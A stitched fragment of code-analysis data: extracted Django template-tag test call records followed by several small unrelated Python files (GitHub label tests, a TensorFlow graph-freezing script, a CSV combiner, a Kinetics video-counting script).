False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((6479, 6519), 'model_blocks.templatetags.model_filters.as_teaser_block', 'model_filters.as_teaser_block', (['pepulator'], {}), '(pepulator)\n', (6508, 6519), False, 'from model_blocks.templatetags import model_filters\n'), ((6537, 6615), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_teaser.html"""'], {}), "('model_blocks/object_teaser.html')\n", (6580, 6615), False, 'from model_blocks.templatetags import model_nodes\n'), ((7244, 7292), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (7268, 7292), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((7462, 7505), 'model_blocks.templatetags.model_filters.as_list_block', 'model_filters.as_list_block', (['pepulator_list'], {}), '(pepulator_list)\n', (7489, 7505), False, 'from model_blocks.templatetags import model_filters\n'), ((7523, 7599), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (7566, 7599), False, 'from model_blocks.templatetags import model_nodes\n'), ((7805, 7871), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (7813, 7871), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((7931, 7979), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (7955, 7979), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), 
((7998, 8037), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (8005, 8037), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8248, 8324), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (8291, 8324), False, 'from model_blocks.templatetags import model_nodes\n'), ((8520, 8586), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (8528, 8586), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8646, 8694), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(5000)'}), '(serial_number__gt=5000)\n', (8670, 8694), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((8713, 8752), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (8720, 8752), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((8871, 8947), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (8914, 8947), False, 'from model_blocks.templatetags import model_nodes\n'), ((9307, 9373), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (9315, 9373), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((9513, 9552), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), 
"({'pepulators': pepulator_list})\n", (9520, 9552), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((9758, 9834), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (9801, 9834), False, 'from model_blocks.templatetags import model_nodes\n'), ((10027, 10093), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block }}"""'], {}), "('{% load model_filters %}{{ pepulators|as_list_block }}')\n", (10035, 10093), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10174, 10213), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (10181, 10213), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10327, 10403), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (10370, 10403), False, 'from model_blocks.templatetags import model_nodes\n'), ((10586, 10675), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulators|as_list_block:"Some Pepulators" }}"""'], {}), '(\n \'{% load model_filters %}{{ pepulators|as_list_block:"Some Pepulators" }}\')\n', (10594, 10675), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((10730, 10778), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (10754, 10778), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((10797, 10836), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': 
pepulator_list})\n", (10804, 10836), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((11052, 11128), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_list.html"""'], {}), "('model_blocks/object_list.html')\n", (11095, 11128), False, 'from model_blocks.templatetags import model_nodes\n'), ((11937, 12117), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% detail_block pepulator %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% detail_block pepulator %}{% endwith %}\'\n )\n', (11945, 12117), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((12235, 12276), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (12256, 12276), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((12295, 12328), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (12302, 12328), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((12885, 12976), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_detail.html"""'], {}), "(\n 'pepulator_factory/pepulator_detail.html')\n", (12928, 12976), False, 'from model_blocks.templatetags import model_nodes\n'), ((13163, 13439), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_fields="serial_number, color, height, 
width" %}{% detail_block pepulator %}{% endwith %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_fields="serial_number, color, height, width" %}{% detail_block pepulator %}{% endwith %}{% endwith %}\'\n )\n', (13171, 13439), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((13621, 13662), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (13642, 13662), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((13681, 13714), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (13688, 13714), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((14173, 14446), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}{% detail_block pepulator %}{% endwith %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_detail_template="pepulator_factory/pepulator_detail.html" %}{% with pepulator_factory_pepulator_exclude="knuckles, jambs, color, address" %}{% detail_block pepulator %}{% endwith %}{% endwith %}\'\n )\n', (14181, 14446), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((14628, 14669), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (14649, 14669), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((14688, 14721), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), 
"({'pepulator': pepulator})\n", (14695, 14721), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((16293, 16473), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}{% teaser_block pepulator %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_teaser_template="pepulator_factory/pepulator_teaser.html" %}{% teaser_block pepulator %}{% endwith %}\'\n )\n', (16301, 16473), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((16591, 16632), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (16612, 16632), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((16651, 16684), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (16658, 16684), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((17241, 17332), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_teaser.html"""'], {}), "(\n 'pepulator_factory/pepulator_teaser.html')\n", (17284, 17332), False, 'from model_blocks.templatetags import model_nodes\n'), ((18368, 18543), 'django.template.Template', 'Template', (['"""{% load model_tags %}{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}{% list_block pepulators %}{% endwith %}"""'], {}), '(\n \'{% load model_tags %}{% with pepulator_factory_pepulator_list_template="pepulator_factory/pepulator_list.html" %}{% list_block pepulators %}{% endwith %}\'\n )\n', (18376, 18543), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18657, 18705), 
'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (18681, 18705), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((18724, 18763), 'django.template.Context', 'Context', (["{'pepulators': pepulator_list}"], {}), "({'pepulators': pepulator_list})\n", (18731, 18763), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18974, 19063), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""pepulator_factory/pepulator_list.html"""'], {}), "(\n 'pepulator_factory/pepulator_list.html')\n", (19017, 19063), False, 'from model_blocks.templatetags import model_nodes\n'), ((19617, 19778), 'django.template.Template', 'Template', (['"""{% load model_blocks %}{% detail_block pepulator %}{% list_block pepulators %}{{ pepulator|as_detail_block }}{{ pepulators|as_list_block }}"""'], {}), "(\n '{% load model_blocks %}{% detail_block pepulator %}{% list_block pepulators %}{{ pepulator|as_detail_block }}{{ pepulators|as_list_block }}'\n )\n", (19625, 19778), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20562, 20651), 'django.template.Template', 'Template', (['"""{% load model_tags %}{{ model }}{% list_block distributors %}{{ model }}"""'], {}), "(\n '{% load model_tags %}{{ model }}{% list_block distributors %}{{ model }}')\n", (20570, 20651), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20772, 20797), 'example_project.pepulator_factory.models.Distributor.objects.all', 'Distributor.objects.all', ([], {}), '()\n', (20795, 20797), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((20816, 20881), 'django.template.Context', 'Context', (["{'model': 'My String', 'distributors': distributor_list}"], {}), "({'model': 'My String', 
'distributors': distributor_list})\n", (20823, 20881), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((753, 1099), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list, is_link in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{% if is_link %}@{{ value }}{% else %}{{ value|safe }}{% endif %}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list, is_link in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{% if is_link %}@{{ value }}{% else %}{{ value|safe }}{% endif %}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (761, 1099), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((5514, 5802), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (5522, 5802), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((7001, 7120), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}"""'], {}), "(\n '{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'\n )\n", (7009, 7120), False, 'from 
django.template import Context, Template, TemplateSyntaxError\n'), ((9445, 9493), 'example_project.pepulator_factory.models.Pepulator.objects.filter', 'Pepulator.objects.filter', ([], {'serial_number__gt': '(2000)'}), '(serial_number__gt=2000)\n', (9469, 9493), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((11511, 11799), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (11519, 11799), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((15867, 16155), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}"""'], {}), "(\n '{{ title|default_if_none:instance|safe }}:{{ model|safe }},{% for name, label, value, is_list in fields %}{{ name|safe }},{{ label|safe }},{% if not is_list %}{{ value|safe }}{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]{% endif %},{% endfor %}'\n )\n", (15875, 16155), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((18108, 18227), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}"""'], {}), "(\n '{{ 
title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}:{{ instance_list|safe }}'\n )\n", (18116, 18227), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((20384, 20473), 'django.template.Template', 'Template', (['"""{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}"""'], {}), "(\n '{{ title|default_if_none:model|capfirst }}{% if not title %}s{% endif %}')\n", (20392, 20473), False, 'from django.template import Context, Template, TemplateSyntaxError\n')] |
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
def getpid():
    """Return the current process id via ``os.getpid``.

    Falls back to the empty string on platforms whose ``os`` module does
    not expose ``getpid``.
    """
    if not hasattr(os, 'getpid'):
        return ""
    return os.getpid()
def cls():
    """Clear the terminal screen with the platform's native command.

    The command is looked up by ``os.name`` ('posix' -> clear, 'nt' -> cls).
    Fix: on an unrecognized platform (e.g. 'java') the original passed
    ``None`` to ``os.system`` and crashed with a TypeError; the call is now
    skipped instead.
    """
    OS = {
        'posix': 'clear',
        'nix': 'cls',  # NOTE(review): 'nix' is not a value os.name takes — likely dead entry
        'nt': 'cls'
    }
    command = OS.get(os.name)
    if command is not None:
        os.system(command)
| [
"os.getpid"
] | [((704, 715), 'os.getpid', 'os.getpid', ([], {}), '()\n', (713, 715), False, 'import os\n')] |
import pytest
from labelsync.github import Github
from labelsync.helpers import HTTPError
from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels
# Shared fixtures for the live-API tests: a configured Github client plus
# sample label payloads used across the test functions below.
c = create_cfg_env('good.cfg')
github = Github(c, name='github', api_url='https://api.github.com/repos')

# Throwaway label exercised by the create/delete tests.
label = dict(name='blabla', color='aa11bb', description='whatever')

# The stock GitHub "bug" label (used to restore state after the edit test).
label_bug = dict(name='bug', color='d73a4a', description="Something isn't working")

# Replacement payload applied to "bug" by the edit test.
label_new_bug = dict(name='ERROR', color='ffffff', description='ERROR')
def test_create_label():
    """Creating a label must add exactly one new entry to the repository."""
    before = get_labels('beskyfil', 'testing_repo')
    github.create_label('beskyfil', 'testing_repo', label)
    after = get_labels('beskyfil', 'testing_repo')
    assert len(after) == len(before) + 1
    assert 'blabla' not in before
    assert 'blabla' in after
def test_delete_label():
    """Deleting a label must remove exactly one entry from the repository."""
    before = get_labels('beskyfil', 'testing_repo')
    github.delete_label('beskyfil', 'testing_repo', label['name'])
    after = get_labels('beskyfil', 'testing_repo')
    assert len(after) == len(before) - 1
    assert 'blabla' in before
    assert 'blabla' not in after
def test_edit_label():
    """Editing a label renames it in place without changing the label count."""
    before = get_labels('beskyfil', 'testing_repo')
    github.edit_label('beskyfil', 'testing_repo', label_new_bug, 'bug')
    after = get_labels('beskyfil', 'testing_repo')
    assert len(after) == len(before)
    assert 'bug' in before
    assert 'bug' not in after
    assert 'ERROR' in after
    assert 'ERROR' not in before
    # revert, leaving the remote repository in its original state
    github.edit_label('beskyfil', 'testing_repo', label_bug, 'ERROR')
| [
"tests.helpers.get_labels",
"tests.helpers.create_cfg_env",
"labelsync.github.Github"
] | [((167, 193), 'tests.helpers.create_cfg_env', 'create_cfg_env', (['"""good.cfg"""'], {}), "('good.cfg')\n", (181, 193), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((203, 267), 'labelsync.github.Github', 'Github', (['c'], {'name': '"""github"""', 'api_url': '"""https://api.github.com/repos"""'}), "(c, name='github', api_url='https://api.github.com/repos')\n", (209, 267), False, 'from labelsync.github import Github\n'), ((638, 676), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (648, 676), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((800, 838), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (810, 838), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1057, 1095), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1067, 1095), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1227, 1265), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1237, 1265), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1482, 1520), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1492, 1520), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n'), ((1657, 1695), 'tests.helpers.get_labels', 'get_labels', (['"""beskyfil"""', '"""testing_repo"""'], {}), "('beskyfil', 'testing_repo')\n", (1667, 1695), False, 'from tests.helpers import fl, FIXTURES_PATH, create_cfg_env, get_labels\n')] |
import os
import tensorflow as tf
import argparse
# CLI: checkpoint to freeze and the directory for the frozen graph.
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_path', type=str, help='path to the model checkpoint (without .meta)')
parser.add_argument('--output_path', type=str, help='directory that will receive detector.pb')
args = parser.parse_args()

# Force CPU-only execution; freezing the graph does not need a GPU.
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"

input_checkpoint = args.ckpt_path
# TensorFlow stores the graph definition next to the checkpoint as <ckpt>.meta.
input_meta_graph = input_checkpoint + '.meta'
# Comma-separated list of graph nodes to keep in the frozen model.
output_node_names = 'tower_0/images,tower_0/boxes,tower_0/scores,tower_0/labels,tower_0/num_detections,training_flag'
output_graph = os.path.join(args.output_path, 'detector.pb')

print('executed')  # fixed typo: was 'excuted'
# Delegate the actual freezing to the tools/freeze.py helper script.
command = "python tools/freeze.py --input_checkpoint %s --input_meta_graph %s --output_node_names %s --output_graph %s"\
          % (input_checkpoint, input_meta_graph, output_node_names, output_graph)
os.system(command) | [
"os.system",
"os.path.join",
"argparse.ArgumentParser"
] | [((66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (89, 91), False, 'import argparse\n'), ((576, 621), 'os.path.join', 'os.path.join', (['args.output_path', '"""detector.pb"""'], {}), "(args.output_path, 'detector.pb')\n", (588, 621), False, 'import os\n'), ((833, 851), 'os.system', 'os.system', (['command'], {}), '(command)\n', (842, 851), False, 'import os\n')] |
import pandas as pd
from pathlib import Path
import sys
''' Concatenates all csv files in the folder passed as the first command-line argument '''
path = Path(sys.argv[1])
def get_csv_paths(path):
    """Return the entries directly inside *path* whose extension is ``.csv``."""
    csv_paths = []
    for entry in path.iterdir():
        if entry.suffix == '.csv':
            csv_paths.append(entry)
    return csv_paths
def ask_details():
    """Prompt the user for the CSV encoding and delimiter; return them as a tuple."""
    print('Please specify the following:')
    # input() calls evaluate left-to-right, so encoding is asked first.
    return input('Encoding\n'), input('Delimiter\n')
def get_frames(files_list, encoding, delimiter):
    """Read every CSV in *files_list* into a string-typed DataFrame.

    Fix: the original iterated the module-level ``csv_files`` instead of the
    ``files_list`` parameter, so the argument was silently ignored.

    :param files_list: iterable of paths to CSV files.
    :param encoding: text encoding passed to ``pd.read_csv``.
    :param delimiter: field separator passed to ``pd.read_csv``.
    :return: list of DataFrames (all columns read as ``str``).
    """
    return [pd.read_csv(p, sep=delimiter, dtype='str', encoding=encoding)
            for p in files_list]
def concat_output(frames):
    """Concatenate *frames* and write the result to ``path / 'COMBINED.csv'``.

    Fix: concatenate once with a single ``pd.concat`` call instead of
    re-concatenating inside a loop (the loop was quadratic in total rows).
    An empty *frames* list still produces an (empty) output file, matching
    the original behaviour.

    :param frames: list of DataFrames to combine.
    """
    output = pd.concat(frames) if frames else pd.DataFrame()
    path_out = path / 'COMBINED.csv'  # `path` is the module-level input folder
    output.to_csv(path_out, sep=';', index=False)
if __name__ == '__main__':
    # Collect the CSVs once, then ask the user how they should be parsed.
    csv_files = get_csv_paths(path)
    encoding, delimiter = ask_details()
    try:
        frames = get_frames(csv_files, encoding, delimiter)
        concat_output(frames)
    except Exception as e:
        # Parsing failed (a wrong encoding/delimiter is the common cause):
        # report the error and give the user one more attempt.
        print('Seems like there were files that could not be read\n')
        print(str(e))
        encoding, delimiter = ask_details()
        frames = get_frames(csv_files, encoding, delimiter)
        concat_output(frames)
concat_output(frames)
| [
"pandas.DataFrame",
"pandas.concat",
"pandas.read_csv",
"pathlib.Path"
] | [((136, 153), 'pathlib.Path', 'Path', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (140, 153), False, 'from pathlib import Path\n'), ((609, 623), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (621, 623), True, 'import pandas as pd\n'), ((483, 544), 'pandas.read_csv', 'pd.read_csv', (['p'], {'sep': 'delimiter', 'dtype': '"""str"""', 'encoding': 'encoding'}), "(p, sep=delimiter, dtype='str', encoding=encoding)\n", (494, 544), True, 'import pandas as pd\n'), ((665, 688), 'pandas.concat', 'pd.concat', (['[output, df]'], {}), '([output, df])\n', (674, 688), True, 'import pandas as pd\n')] |
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
    """
    Count present and missing videos for a class based on metadata.
    :param cls: The class. If None, count all videos (used for testing videos - no classes).
    :param directory: Directory containing the videos.
    :param metadata: Kinetics metadata json.
    :return: Tuple: number present videos, number of missing videos
    """
    present = 0
    missing = 0
    for video_id, record in metadata.items():
        # When a class filter is given, skip entries with a different label.
        if cls is not None and record["annotations"]["label"] != cls:
            continue
        video_path = os.path.join(directory, "{}.mp4".format(video_id))
        if os.path.isfile(video_path):
            present += 1
        else:
            missing += 1
    return present, missing
def main(args):
    """Print download statistics for the Kinetics dataset.

    Counts, per class, how many train/validation videos referenced by the
    metadata are actually present on disk, then prints aggregate statistics
    (plus test-set coverage, which has no class labels).

    :param args: parsed CLI namespace with ``details`` (verbose per-class
        output) and ``subset`` (optional path to a JSON list of classes).
    """
    # load video classes
    classes = utils.load_json(config.CLASSES_PATH)
    # load lists of videos
    train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
    val_metadata = utils.load_json(config.VAL_METADATA_PATH)
    test_metadata = utils.load_json(config.TEST_METADATA_PATH)
    num_found = 0
    total = 0
    total_train_present = 0
    total_train_missing = 0
    total_val_present = 0
    total_val_missing = 0
    # load subset (optional restriction of which classes are counted)
    subset = None
    if args.subset:
        subset = utils.load_json(args.subset)
    # count train and validation videos
    for cls in classes:
        # when a subset is given, skip classes outside it
        if subset is not None and cls not in subset:
            continue
        total += 1
        # class directories use underscores instead of spaces
        cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
        cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
        train_found = False
        valid_found = False
        if os.path.isdir(cls_train_path):
            train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
            train_found = True
            total_train_present += train_present
            total_train_missing += train_missing
        if os.path.isdir(cls_valid_path):
            valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
            valid_found = True
            total_val_present += valid_present
            total_val_missing += valid_missing
        if train_found or valid_found:
            num_found += 1
        if args.details:
            print("class {}".format(cls))
            if train_found:
                print("train: {} / {}".format(train_present, train_present + train_missing))
            if valid_found:
                print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
            print()
    # count test videos (cls=None: the test set carries no class labels)
    test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
    # print summary (percentage guards avoid division by zero)
    train_percent_found = 0
    if total_train_present > 0:
        train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
    valid_percent_found = 0
    if total_val_present > 0:
        valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
    test_percent_found = 0
    if test_present > 0:
        test_percent_found = (test_present * 100) / (test_present + test_missing)
    print("class stats:")
    print("\t{:d} / {:d} classes found".format(num_found, total))
    print()
    print("video stats (only for found classes):")
    print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
        total_train_present, total_train_present + total_train_missing, train_percent_found))
    print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
        total_val_present, total_val_present + total_val_missing, valid_percent_found))
    print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
        test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
    # CLI: optional per-class details and an optional JSON subset file
    # restricting which Kinetics classes are counted.
    parser = argparse.ArgumentParser("Print statistics about downloaded videos.")
    parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
    parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
    parsed = parser.parse_args()
main(parsed) | [
"os.path.isdir",
"lib.utils.load_json",
"argparse.ArgumentParser"
